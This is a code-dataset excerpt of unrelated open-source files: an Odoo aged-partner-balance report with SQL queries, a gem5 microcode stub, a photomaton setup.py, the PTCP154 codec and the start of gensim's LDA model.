t = self.cr.fetchall()
for i in t:
totals['Unknown Partner'] = i[0]
future_past = {}
if self.direction_selection == 'future':
self.cr.execute('SELECT SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am\
WHERE (l.account_id=account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (l.partner_id IS NULL)\
AND (account_account.type IN %s)\
AND (COALESCE(l.date_maturity, l.date) < %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active ', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, self.date_from))
t = self.cr.fetchall()
for i in t:
future_past['Unknown Partner'] = i[0]
elif self.direction_selection == 'past': # Using elif so people could extend without this breaking
self.cr.execute('SELECT SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id=account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (l.partner_id IS NULL)\
AND (account_account.type IN %s)\
AND (COALESCE(l.date_maturity,l.date) > %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active ', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, self.date_from))
t = self.cr.fetchall()
for i in t:
future_past['Unknown Partner'] = i[0]
history = []
for i in range(5):
args_list = (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from,)
dates_query = '(COALESCE(l.date_maturity,l.date)'
if form[str(i)]['start'] and form[str(i)]['stop']:
dates_query += ' BETWEEN %s AND %s)'
args_list += (form[str(i)]['start'], form[str(i)]['stop'])
elif form[str(i)]['start']:
dates_query += ' > %s)'
args_list += (form[str(i)]['start'],)
else:
dates_query += ' < %s)'
args_list += (form[str(i)]['stop'],)
args_list += (self.date_from,)
self.cr.execute('SELECT SUM(l.debit-l.credit)\
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id = account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND (l.partner_id IS NULL)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active\
AND ' + dates_query + '\
AND (l.date <= %s)\
GROUP BY l.partner_id', args_list)
t = self.cr.fetchall()
d = {}
for i in t:
d['Unknown Partner'] = i[0]
history.append(d)
values = {}
if self.direction_selection == 'future':
before = False
if future_past.has_key('Unknown Partner'):
before = [ future_past['Unknown Partner'] ]
self.total_account[6] = self.total_account[6] + (before and before[0] or 0.0)
values['direction'] = before and before[0] or 0.0
elif self.direction_selection == 'past':
after = False
if future_past.has_key('Unknown Partner'):
after = [ future_past['Unknown Partner'] ]
self.total_account[6] = self.total_account[6] + (after and after[0] or 0.0)
values['direction'] = after and after[0] or 0.0
for i in range(5):
during = False
if history[i].has_key('Unknown Partner'):
during = [ history[i]['Unknown Partner'] ]
self.total_account[(i)] = self.total_account[(i)] + (during and during[0] or 0)
values[str(i)] = during and during[0] or 0.0
total = False
if totals.has_key( 'Unknown Partner' ):
total = [ totals['Unknown Partner'] ]
values['total'] = total and total[0] or 0.0
## Add for total
self.total_account[(i+1)] = self.total_account[(i+1)] + (total and total[0] or 0.0)
values['name'] = 'Unknown Partner'
if values['total']:
res.append(values)
total = 0.0
totals = {}
for r in res:
total += float(r['total'] or 0.0)
for i in range(5)+['direction']:
totals.setdefault(str(i), 0.0)
totals[str(i)] += float(r[str(i)] or 0.0)
return res
def _get_total(self,pos):
period = self.total_account[int(pos)]
return period or 0.0
def _get_direction(self,pos):
period = self.total_account[int(pos)]
return period or 0.0
def _get_for_period(self,pos):
period = self.total_account[int(pos)]
return period or 0.0
def _get_partners(self,data):
# TODO: deprecated, to remove in trunk
if data['form']['result_selection'] == 'customer':
return self._translate('Receivable Accounts')
elif data['form']['result_selection'] == 'supplier':
return self._translate('Payable Accounts')
elif data['form']['result_selection'] == 'customer_supplier':
return self._translate('Receivable and Payable Accounts')
return ''
class report_agedpartnerbalance(osv.AbstractModel):
_name = 'report.account.report_agedpartnerbalance'
_inherit = 'report.abstract_report'
_template = 'account.report_agedpartnerbalance'
_wrapped_report_class = aged_trial_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
xiaoyaozi5566/DynamicCache
|
src/arch/x86/isa/insts/simd128/floating_point/data_transfer/move_non_temporal.py
|
86
|
2162
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
# MOVNTPS
# MOVNTPD
'''
|
bsd-3-clause
|
paulla/photomaton
|
setup.py
|
1
|
1536
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import os
version = '0.1.dev0'
here = os.path.abspath(os.path.dirname(__file__))
def read_file(*pathes):
path = os.path.join(here, *pathes)
if os.path.isfile(path):
with open(path, 'r') as desc_file:
return desc_file.read()
else:
return ''
desc_files = (('README.rst',), ('docs', 'CHANGES.rst'),
('docs', 'CONTRIBUTORS.rst'))
long_description = '\n\n'.join([read_file(*pathes) for pathes in desc_files])
install_requires=['setuptools']
setup(name='paulla.paullaroid',
version=version,
description="Photomaton by PauLLA and MIPS-LAB",
long_description=long_description,
platforms = ["any"],
# Get more strings from
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
"Programming Language :: Python",
"License :: OSI Approved :: BSD License",
],
keywords="photomaton, python, raspberry",
author="voileux",
author_email="[email protected]",
url="https://github.com/paulla/photomaton",
license="BSD",
packages=find_packages("src"),
package_dir = {"": "src"},
namespace_packages=["paulla"],
include_package_data=True,
zip_safe=False,
install_requires=install_requires,
entry_points="""
# -*- Entry points: -*-
[console_scripts]
paullaroid = paulla.paullaroid.photomaton:main
""",
)
# vim:set et sts=4 ts=4 tw=80:
|
mit
|
axbaretto/beam
|
venv/lib/python2.7/encodings/ptcp154.py
|
647
|
8950
|
""" Python Character Mapping Codec generated from 'PTCP154.txt' with gencodec.py.
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_map)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_map)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='ptcp154',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0496, # CYRILLIC CAPITAL LETTER ZHE WITH DESCENDER
0x0081: 0x0492, # CYRILLIC CAPITAL LETTER GHE WITH STROKE
0x0082: 0x04ee, # CYRILLIC CAPITAL LETTER U WITH MACRON
0x0083: 0x0493, # CYRILLIC SMALL LETTER GHE WITH STROKE
0x0084: 0x201e, # DOUBLE LOW-9 QUOTATION MARK
0x0085: 0x2026, # HORIZONTAL ELLIPSIS
0x0086: 0x04b6, # CYRILLIC CAPITAL LETTER CHE WITH DESCENDER
0x0087: 0x04ae, # CYRILLIC CAPITAL LETTER STRAIGHT U
0x0088: 0x04b2, # CYRILLIC CAPITAL LETTER HA WITH DESCENDER
0x0089: 0x04af, # CYRILLIC SMALL LETTER STRAIGHT U
0x008a: 0x04a0, # CYRILLIC CAPITAL LETTER BASHKIR KA
0x008b: 0x04e2, # CYRILLIC CAPITAL LETTER I WITH MACRON
0x008c: 0x04a2, # CYRILLIC CAPITAL LETTER EN WITH DESCENDER
0x008d: 0x049a, # CYRILLIC CAPITAL LETTER KA WITH DESCENDER
0x008e: 0x04ba, # CYRILLIC CAPITAL LETTER SHHA
0x008f: 0x04b8, # CYRILLIC CAPITAL LETTER CHE WITH VERTICAL STROKE
0x0090: 0x0497, # CYRILLIC SMALL LETTER ZHE WITH DESCENDER
0x0091: 0x2018, # LEFT SINGLE QUOTATION MARK
0x0092: 0x2019, # RIGHT SINGLE QUOTATION MARK
0x0093: 0x201c, # LEFT DOUBLE QUOTATION MARK
0x0094: 0x201d, # RIGHT DOUBLE QUOTATION MARK
0x0095: 0x2022, # BULLET
0x0096: 0x2013, # EN DASH
0x0097: 0x2014, # EM DASH
0x0098: 0x04b3, # CYRILLIC SMALL LETTER HA WITH DESCENDER
0x0099: 0x04b7, # CYRILLIC SMALL LETTER CHE WITH DESCENDER
0x009a: 0x04a1, # CYRILLIC SMALL LETTER BASHKIR KA
0x009b: 0x04e3, # CYRILLIC SMALL LETTER I WITH MACRON
0x009c: 0x04a3, # CYRILLIC SMALL LETTER EN WITH DESCENDER
0x009d: 0x049b, # CYRILLIC SMALL LETTER KA WITH DESCENDER
0x009e: 0x04bb, # CYRILLIC SMALL LETTER SHHA
0x009f: 0x04b9, # CYRILLIC SMALL LETTER CHE WITH VERTICAL STROKE
0x00a1: 0x040e, # CYRILLIC CAPITAL LETTER SHORT U (Byelorussian)
0x00a2: 0x045e, # CYRILLIC SMALL LETTER SHORT U (Byelorussian)
0x00a3: 0x0408, # CYRILLIC CAPITAL LETTER JE
0x00a4: 0x04e8, # CYRILLIC CAPITAL LETTER BARRED O
0x00a5: 0x0498, # CYRILLIC CAPITAL LETTER ZE WITH DESCENDER
0x00a6: 0x04b0, # CYRILLIC CAPITAL LETTER STRAIGHT U WITH STROKE
0x00a8: 0x0401, # CYRILLIC CAPITAL LETTER IO
0x00aa: 0x04d8, # CYRILLIC CAPITAL LETTER SCHWA
0x00ad: 0x04ef, # CYRILLIC SMALL LETTER U WITH MACRON
0x00af: 0x049c, # CYRILLIC CAPITAL LETTER KA WITH VERTICAL STROKE
0x00b1: 0x04b1, # CYRILLIC SMALL LETTER STRAIGHT U WITH STROKE
0x00b2: 0x0406, # CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I
0x00b3: 0x0456, # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
0x00b4: 0x0499, # CYRILLIC SMALL LETTER ZE WITH DESCENDER
0x00b5: 0x04e9, # CYRILLIC SMALL LETTER BARRED O
0x00b8: 0x0451, # CYRILLIC SMALL LETTER IO
0x00b9: 0x2116, # NUMERO SIGN
0x00ba: 0x04d9, # CYRILLIC SMALL LETTER SCHWA
0x00bc: 0x0458, # CYRILLIC SMALL LETTER JE
0x00bd: 0x04aa, # CYRILLIC CAPITAL LETTER ES WITH DESCENDER
0x00be: 0x04ab, # CYRILLIC SMALL LETTER ES WITH DESCENDER
0x00bf: 0x049d, # CYRILLIC SMALL LETTER KA WITH VERTICAL STROKE
0x00c0: 0x0410, # CYRILLIC CAPITAL LETTER A
0x00c1: 0x0411, # CYRILLIC CAPITAL LETTER BE
0x00c2: 0x0412, # CYRILLIC CAPITAL LETTER VE
0x00c3: 0x0413, # CYRILLIC CAPITAL LETTER GHE
0x00c4: 0x0414, # CYRILLIC CAPITAL LETTER DE
0x00c5: 0x0415, # CYRILLIC CAPITAL LETTER IE
0x00c6: 0x0416, # CYRILLIC CAPITAL LETTER ZHE
0x00c7: 0x0417, # CYRILLIC CAPITAL LETTER ZE
0x00c8: 0x0418, # CYRILLIC CAPITAL LETTER I
0x00c9: 0x0419, # CYRILLIC CAPITAL LETTER SHORT I
0x00ca: 0x041a, # CYRILLIC CAPITAL LETTER KA
0x00cb: 0x041b, # CYRILLIC CAPITAL LETTER EL
0x00cc: 0x041c, # CYRILLIC CAPITAL LETTER EM
0x00cd: 0x041d, # CYRILLIC CAPITAL LETTER EN
0x00ce: 0x041e, # CYRILLIC CAPITAL LETTER O
0x00cf: 0x041f, # CYRILLIC CAPITAL LETTER PE
0x00d0: 0x0420, # CYRILLIC CAPITAL LETTER ER
0x00d1: 0x0421, # CYRILLIC CAPITAL LETTER ES
0x00d2: 0x0422, # CYRILLIC CAPITAL LETTER TE
0x00d3: 0x0423, # CYRILLIC CAPITAL LETTER U
0x00d4: 0x0424, # CYRILLIC CAPITAL LETTER EF
0x00d5: 0x0425, # CYRILLIC CAPITAL LETTER HA
0x00d6: 0x0426, # CYRILLIC CAPITAL LETTER TSE
0x00d7: 0x0427, # CYRILLIC CAPITAL LETTER CHE
0x00d8: 0x0428, # CYRILLIC CAPITAL LETTER SHA
0x00d9: 0x0429, # CYRILLIC CAPITAL LETTER SHCHA
0x00da: 0x042a, # CYRILLIC CAPITAL LETTER HARD SIGN
0x00db: 0x042b, # CYRILLIC CAPITAL LETTER YERU
0x00dc: 0x042c, # CYRILLIC CAPITAL LETTER SOFT SIGN
0x00dd: 0x042d, # CYRILLIC CAPITAL LETTER E
0x00de: 0x042e, # CYRILLIC CAPITAL LETTER YU
0x00df: 0x042f, # CYRILLIC CAPITAL LETTER YA
0x00e0: 0x0430, # CYRILLIC SMALL LETTER A
0x00e1: 0x0431, # CYRILLIC SMALL LETTER BE
0x00e2: 0x0432, # CYRILLIC SMALL LETTER VE
0x00e3: 0x0433, # CYRILLIC SMALL LETTER GHE
0x00e4: 0x0434, # CYRILLIC SMALL LETTER DE
0x00e5: 0x0435, # CYRILLIC SMALL LETTER IE
0x00e6: 0x0436, # CYRILLIC SMALL LETTER ZHE
0x00e7: 0x0437, # CYRILLIC SMALL LETTER ZE
0x00e8: 0x0438, # CYRILLIC SMALL LETTER I
0x00e9: 0x0439, # CYRILLIC SMALL LETTER SHORT I
0x00ea: 0x043a, # CYRILLIC SMALL LETTER KA
0x00eb: 0x043b, # CYRILLIC SMALL LETTER EL
0x00ec: 0x043c, # CYRILLIC SMALL LETTER EM
0x00ed: 0x043d, # CYRILLIC SMALL LETTER EN
0x00ee: 0x043e, # CYRILLIC SMALL LETTER O
0x00ef: 0x043f, # CYRILLIC SMALL LETTER PE
0x00f0: 0x0440, # CYRILLIC SMALL LETTER ER
0x00f1: 0x0441, # CYRILLIC SMALL LETTER ES
0x00f2: 0x0442, # CYRILLIC SMALL LETTER TE
0x00f3: 0x0443, # CYRILLIC SMALL LETTER U
0x00f4: 0x0444, # CYRILLIC SMALL LETTER EF
0x00f5: 0x0445, # CYRILLIC SMALL LETTER HA
0x00f6: 0x0446, # CYRILLIC SMALL LETTER TSE
0x00f7: 0x0447, # CYRILLIC SMALL LETTER CHE
0x00f8: 0x0448, # CYRILLIC SMALL LETTER SHA
0x00f9: 0x0449, # CYRILLIC SMALL LETTER SHCHA
0x00fa: 0x044a, # CYRILLIC SMALL LETTER HARD SIGN
0x00fb: 0x044b, # CYRILLIC SMALL LETTER YERU
0x00fc: 0x044c, # CYRILLIC SMALL LETTER SOFT SIGN
0x00fd: 0x044d, # CYRILLIC SMALL LETTER E
0x00fe: 0x044e, # CYRILLIC SMALL LETTER YU
0x00ff: 0x044f, # CYRILLIC SMALL LETTER YA
})
### Encoding Map
encoding_map = codecs.make_encoding_map(decoding_map)
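# Illustrative sketch (hypothetical usage): the maps above can be exercised directly
# through the codecs charmap helpers, e.g.
#
#     import codecs
#     codecs.charmap_encode(u'\u0496', 'strict', encoding_map)   # -> ('\x80', 1)
#     codecs.charmap_decode('\x80', 'strict', decoding_map)      # -> (u'\u0496', 1)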
|
apache-2.0
|
summanlp/gensim
|
gensim/models/ldamodel.py
|
1
|
53431
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
**For a faster implementation of LDA (parallelized for multicore machines), see** :mod:`gensim.models.ldamulticore`.
Latent Dirichlet Allocation (LDA) in Python.
This module allows both LDA model estimation from a training corpus and inference of topic
distribution on new, unseen documents. The model can also be updated with new documents
for online training.
The core estimation code is based on the `onlineldavb.py` script by M. Hoffman [1]_, see
**Hoffman, Blei, Bach: Online Learning for Latent Dirichlet Allocation, NIPS 2010.**
The algorithm:
* is **streamed**: training documents may come in sequentially, no random access required,
* runs in **constant memory** w.r.t. the number of documents: size of the
training corpus does not affect memory footprint, can process corpora larger than RAM, and
* is **distributed**: makes use of a cluster of machines, if available, to
speed up model estimation.
.. [1] http://www.cs.princeton.edu/~mdhoffma
"""
import logging
import numbers
import os
import numpy as np
import six
from scipy.special import gammaln, psi # gamma function utils
from scipy.special import polygamma
from six.moves import xrange
from collections import defaultdict
from gensim import interfaces, utils, matutils
from gensim.matutils import dirichlet_expectation
from gensim.matutils import kullback_leibler, hellinger, jaccard_distance, jensen_shannon
from gensim.models import basemodel, CoherenceModel
from gensim.models.callbacks import Callback
# log(sum(exp(x))) that tries to avoid overflow
try:
# try importing from here if older scipy is installed
from scipy.maxentropy import logsumexp
except ImportError:
# maxentropy has been removed in recent releases, logsumexp now in misc
from scipy.misc import logsumexp
logger = logging.getLogger('gensim.models.ldamodel')
def update_dir_prior(prior, N, logphat, rho):
"""
Updates a given prior using Newton's method, described in
**Huang: Maximum Likelihood Estimation of Dirichlet Distribution Parameters.**
http://jonathan-huang.org/research/dirichlet/dirichlet.pdf
"""
dprior = np.copy(prior)
gradf = N * (psi(np.sum(prior)) - psi(prior) + logphat)
c = N * polygamma(1, np.sum(prior))
q = -N * polygamma(1, prior)
b = np.sum(gradf / q) / (1 / c + np.sum(1 / q))
dprior = -(gradf - b) / q
if all(rho * dprior + prior > 0):
prior += rho * dprior
else:
logger.warning("updated prior not positive")
return prior
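# Illustrative sketch, assuming `gammat` holds the variational gammas of the last
# mini-batch of N documents (hypothetical usage of the helper above):
#
#     N = float(len(gammat))
#     logphat = sum(dirichlet_expectation(gamma) for gamma in gammat) / N
#     alpha = update_dir_prior(np.ones(10) / 10., N, logphat, rho=0.7)
#
# which mirrors what LdaModel.update_alpha() does further below.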
class LdaState(utils.SaveLoad):
"""
Encapsulate information for distributed computation of LdaModel objects.
Objects of this class are sent over the network, so try to keep them lean to
reduce traffic.
"""
def __init__(self, eta, shape):
self.eta = eta
self.sstats = np.zeros(shape)
self.numdocs = 0
def reset(self):
"""
Prepare the state for a new EM iteration (reset sufficient stats).
"""
self.sstats[:] = 0.0
self.numdocs = 0
def merge(self, other):
"""
Merge the result of an E step from one node with that of another node
(summing up sufficient statistics).
The merging is trivial and after merging all cluster nodes, we have the
exact same result as if the computation was run on a single node (no
approximation).
"""
assert other is not None
self.sstats += other.sstats
self.numdocs += other.numdocs
def blend(self, rhot, other, targetsize=None):
"""
Given LdaState `other`, merge it with the current state. Stretch both to
`targetsize` documents before merging, so that they are of comparable
magnitude.
Merging is done by average weighting: in the extremes, `rhot=0.0` means
`other` is completely ignored; `rhot=1.0` means `self` is completely ignored.
This procedure corresponds to the stochastic gradient update from Hoffman
et al., algorithm 2 (eq. 14).
"""
assert other is not None
if targetsize is None:
targetsize = self.numdocs
# stretch the current model's expected n*phi counts to target size
if self.numdocs == 0 or targetsize == self.numdocs:
scale = 1.0
else:
scale = 1.0 * targetsize / self.numdocs
self.sstats *= (1.0 - rhot) * scale
# stretch the incoming n*phi counts to target size
if other.numdocs == 0 or targetsize == other.numdocs:
scale = 1.0
else:
logger.info("merging changes from %i documents into a model of %i documents",
other.numdocs, targetsize)
scale = 1.0 * targetsize / other.numdocs
self.sstats += rhot * scale * other.sstats
self.numdocs = targetsize
def blend2(self, rhot, other, targetsize=None):
"""
        Alternative, simpler blend.
"""
assert other is not None
if targetsize is None:
targetsize = self.numdocs
# merge the two matrices by summing
self.sstats += other.sstats
self.numdocs = targetsize
def get_lambda(self):
return self.eta + self.sstats
def get_Elogbeta(self):
return dirichlet_expectation(self.get_lambda())
# endclass LdaState
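# Illustrative sketch (hypothetical usage): two LdaState objects holding sufficient
# statistics can be combined either exactly (multi-node E step) or as a weighted blend:
#
#     state_a = LdaState(eta=0.1, shape=(10, 5000))
#     state_b = LdaState(eta=0.1, shape=(10, 5000))
#     state_a.merge(state_b)                   # exact: sstats and numdocs are summed
#     state_a.blend(rhot=0.5, other=state_b)   # weighted update (Hoffman et al., eq. 14)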
class LdaModel(interfaces.TransformationABC, basemodel.BaseTopicModel):
"""
The constructor estimates Latent Dirichlet Allocation model parameters based
on a training corpus:
>>> lda = LdaModel(corpus, num_topics=10)
You can then infer topic distributions on new, unseen documents, with
>>> doc_lda = lda[doc_bow]
The model can be updated (trained) with new documents via
>>> lda.update(other_corpus)
Model persistency is achieved through its `load`/`save` methods.
"""
def __init__(self, corpus=None, num_topics=100, id2word=None,
distributed=False, chunksize=2000, passes=1, update_every=1,
alpha='symmetric', eta=None, decay=0.5, offset=1.0, eval_every=10,
iterations=50, gamma_threshold=0.001, minimum_probability=0.01,
random_state=None, ns_conf=None, minimum_phi_value=0.01,
per_word_topics=False, callbacks=None):
"""
If given, start training from the iterable `corpus` straight away. If not given,
the model is left untrained (presumably because you want to call `update()` manually).
`num_topics` is the number of requested latent topics to be extracted from
the training corpus.
`id2word` is a mapping from word ids (integers) to words (strings). It is
used to determine the vocabulary size, as well as for debugging and topic
printing.
`alpha` and `eta` are hyperparameters that affect sparsity of the document-topic
(theta) and topic-word (lambda) distributions. Both default to a symmetric
1.0/num_topics prior.
`alpha` can be set to an explicit array = prior of your choice. It also
        supports special values of 'asymmetric' and 'auto': the former uses a fixed
normalized asymmetric 1.0/topicno prior, the latter learns an asymmetric
prior directly from your data.
`eta` can be a scalar for a symmetric prior over topic/word
distributions, or a vector of shape num_words, which can be used to
impose (user defined) asymmetric priors over the word distribution.
It also supports the special value 'auto', which learns an asymmetric
prior over words directly from your data. `eta` can also be a matrix
of shape num_topics x num_words, which can be used to impose
asymmetric priors over the word distribution on a per-topic basis
(can not be learned from data).
Turn on `distributed` to force distributed computing (see the `web tutorial <http://radimrehurek.com/gensim/distributed.html>`_
on how to set up a cluster of machines for gensim).
Calculate and log perplexity estimate from the latest mini-batch every
`eval_every` model updates (setting this to 1 slows down training ~2x;
default is 10 for better performance). Set to None to disable perplexity estimation.
`decay` and `offset` parameters are the same as Kappa and Tau_0 in
Hoffman et al, respectively.
`minimum_probability` controls filtering the topics returned for a document (bow).
`random_state` can be a np.random.RandomState object or the seed for one
`callbacks` a list of metric callbacks to log/visualize evaluation metrics of topic model during training
Example:
>>> lda = LdaModel(corpus, num_topics=100) # train model
>>> print(lda[doc_bow]) # get topic probability distribution for a document
>>> lda.update(corpus2) # update the LDA model with additional documents
>>> print(lda[doc_bow])
>>> lda = LdaModel(corpus, num_topics=50, alpha='auto', eval_every=5) # train asymmetric alpha from data
"""
# store user-supplied parameters
self.id2word = id2word
if corpus is None and self.id2word is None:
raise ValueError('at least one of corpus/id2word must be specified, to establish input space dimensionality')
if self.id2word is None:
logger.warning("no word id mapping provided; initializing from corpus, assuming identity")
self.id2word = utils.dict_from_corpus(corpus)
self.num_terms = len(self.id2word)
elif len(self.id2word) > 0:
self.num_terms = 1 + max(self.id2word.keys())
else:
self.num_terms = 0
if self.num_terms == 0:
raise ValueError("cannot compute LDA over an empty collection (no terms)")
self.distributed = bool(distributed)
self.num_topics = int(num_topics)
self.chunksize = chunksize
self.decay = decay
self.offset = offset
self.minimum_probability = minimum_probability
self.num_updates = 0
self.passes = passes
self.update_every = update_every
self.eval_every = eval_every
self.minimum_phi_value = minimum_phi_value
self.per_word_topics = per_word_topics
self.callbacks = callbacks
self.alpha, self.optimize_alpha = self.init_dir_prior(alpha, 'alpha')
assert self.alpha.shape == (self.num_topics,), "Invalid alpha shape. Got shape %s, but expected (%d, )" % (str(self.alpha.shape), self.num_topics)
if isinstance(eta, six.string_types):
if eta == 'asymmetric':
raise ValueError("The 'asymmetric' option cannot be used for eta")
self.eta, self.optimize_eta = self.init_dir_prior(eta, 'eta')
self.random_state = utils.get_random_state(random_state)
assert self.eta.shape == (self.num_terms,) or self.eta.shape == (self.num_topics, self.num_terms), (
"Invalid eta shape. Got shape %s, but expected (%d, 1) or (%d, %d)" %
(str(self.eta.shape), self.num_terms, self.num_topics, self.num_terms))
# VB constants
self.iterations = iterations
self.gamma_threshold = gamma_threshold
# set up distributed environment if necessary
if not distributed:
logger.info("using serial LDA version on this node")
self.dispatcher = None
self.numworkers = 1
else:
if self.optimize_alpha:
raise NotImplementedError("auto-optimizing alpha not implemented in distributed LDA")
# set up distributed version
try:
import Pyro4
if ns_conf is None:
ns_conf = {}
with utils.getNS(**ns_conf) as ns:
from gensim.models.lda_dispatcher import LDA_DISPATCHER_PREFIX
self.dispatcher = Pyro4.Proxy(ns.list(prefix=LDA_DISPATCHER_PREFIX)[LDA_DISPATCHER_PREFIX])
logger.debug("looking for dispatcher at %s" % str(self.dispatcher._pyroUri))
self.dispatcher.initialize(id2word=self.id2word, num_topics=self.num_topics,
chunksize=chunksize, alpha=alpha, eta=eta, distributed=False)
self.numworkers = len(self.dispatcher.getworkers())
logger.info("using distributed version with %i workers" % self.numworkers)
except Exception as err:
logger.error("failed to initialize distributed LDA (%s)", err)
raise RuntimeError("failed to initialize distributed LDA (%s)" % err)
# Initialize the variational distribution q(beta|lambda)
self.state = LdaState(self.eta, (self.num_topics, self.num_terms))
self.state.sstats = self.random_state.gamma(100., 1. / 100., (self.num_topics, self.num_terms))
self.expElogbeta = np.exp(dirichlet_expectation(self.state.sstats))
# if a training corpus was provided, start estimating the model right away
if corpus is not None:
use_numpy = self.dispatcher is not None
self.update(corpus, chunks_as_numpy=use_numpy)
def init_dir_prior(self, prior, name):
if prior is None:
prior = 'symmetric'
if name == 'alpha':
prior_shape = self.num_topics
elif name == 'eta':
prior_shape = self.num_terms
else:
raise ValueError("'name' must be 'alpha' or 'eta'")
is_auto = False
if isinstance(prior, six.string_types):
if prior == 'symmetric':
logger.info("using symmetric %s at %s", name, 1.0 / prior_shape)
init_prior = np.asarray([1.0 / self.num_topics for i in xrange(prior_shape)])
elif prior == 'asymmetric':
init_prior = np.asarray([1.0 / (i + np.sqrt(prior_shape)) for i in xrange(prior_shape)])
init_prior /= init_prior.sum()
logger.info("using asymmetric %s %s", name, list(init_prior))
elif prior == 'auto':
is_auto = True
init_prior = np.asarray([1.0 / self.num_topics for i in xrange(prior_shape)])
if name == 'alpha':
logger.info("using autotuned %s, starting with %s", name, list(init_prior))
else:
raise ValueError("Unable to determine proper %s value given '%s'" % (name, prior))
elif isinstance(prior, list):
init_prior = np.asarray(prior)
elif isinstance(prior, np.ndarray):
init_prior = prior
elif isinstance(prior, np.number) or isinstance(prior, numbers.Real):
init_prior = np.asarray([prior] * prior_shape)
else:
raise ValueError("%s must be either a np array of scalars, list of scalars, or scalar" % name)
return init_prior, is_auto
def __str__(self):
return "LdaModel(num_terms=%s, num_topics=%s, decay=%s, chunksize=%s)" % \
(self.num_terms, self.num_topics, self.decay, self.chunksize)
def sync_state(self):
self.expElogbeta = np.exp(self.state.get_Elogbeta())
def clear(self):
"""Clear model state (free up some memory). Used in the distributed algo."""
self.state = None
self.Elogbeta = None
def inference(self, chunk, collect_sstats=False):
"""
Given a chunk of sparse document vectors, estimate gamma (parameters
controlling the topic weights) for each document in the chunk.
This function does not modify the model (=is read-only aka const). The
        whole input chunk of documents is assumed to fit in RAM; chunking of a
large corpus must be done earlier in the pipeline.
If `collect_sstats` is True, also collect sufficient statistics needed
to update the model's topic-word distributions, and return a 2-tuple
`(gamma, sstats)`. Otherwise, return `(gamma, None)`. `gamma` is of shape
`len(chunk) x self.num_topics`.
